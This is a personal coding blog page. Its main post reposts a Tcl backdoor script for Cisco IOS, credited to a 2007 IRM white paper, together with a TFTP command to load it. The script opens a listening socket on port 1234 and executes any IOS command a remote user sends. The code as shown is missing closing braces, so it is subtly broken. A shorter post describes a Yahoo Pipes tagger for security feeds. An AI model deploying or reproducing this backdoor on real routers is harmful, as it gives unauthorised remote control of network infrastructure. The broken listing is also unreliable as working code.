Fork me on GitHub
Its the Code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man. VBS, PHP, TCL, TK, PERL, C++, JAVA....what now? Ruby?
No Wait.. It should be just RUBY!


Shell code for IOS using TCLSH on Cisco devices..

An nice article that went out by IRM talked about simple way to create TCL backdoor for cisco IOS. You can read the white paper here.
Oops: didnt known what I was sourcing..

Router(tcl)#source tftp://tftpserver/tclsh.tcl


# TclShell.tcl v0.1 by Andy Davis, IRM 2007
# IRM accepts no responsibility for the misuse of this code
# It is provided for demonstration purposes only
proc callback {sock addr port} {
fconfigure $sock -translation lf -buffering line
puts $sock " "
puts $sock "-------------------------------------"
puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"
puts $sock "-------------------------------------"
puts $sock " "
set response [exec "sh ver | inc IOS"]
puts $sock $response
set response [exec "sh priv"]
puts $sock $response
puts $sock " "
puts $sock "Enter IOS command:"
fileevent $sock readable [list echo $sock]
proc echo {sock} {
global var
if {[eof $sock] || [catch {gets $sock line}]} {
} else {
set response [exec "$line"]
puts $sock $response
set port 1234
set sh [socket -server callback $port]
vwait var
close $sh

All material is IRM's, this is just a snippet from the article.


Low hangin fruit

Hacking old skool windows..

Notes from a CEH. Nothing new, but at least the basic are covered. This all should be automated by some wrapper so you don't waste time.. Generally you could do all this in Backtrack or similar builds.


RSS / ATOM - Security Tagging Framework for Yahoo PIPES

I've been using YAHOO pipes for awhile to help filter some of the junk on full disclosure. Tagging became part of my daily habits so I thought it most appropriate to create auto taggers so I can read / filter much more quickly.

Security Tagging FrameWork

The basics of the PIPE is an array of regular expressions that strip off unneccessary titles, duplicates, responses, and add Pre-titles such as {Vulnerability}{Web-based}.

Ive also created an example on how to use the framework with existing YAHOO-PIPES.

Vulnerability Watch++ (Security Tagging Framework Example)

This PIPE aggregates two feeds and uniques them, and tags them utilizing the framework twice.

Side note:

GNUCitizen posted two nice articles on PIPES and their flexibility to be utilized with JSON database.

1. 5-generic-yahoo-pipes-hackers-cannot-live-without

2. Project Renaissance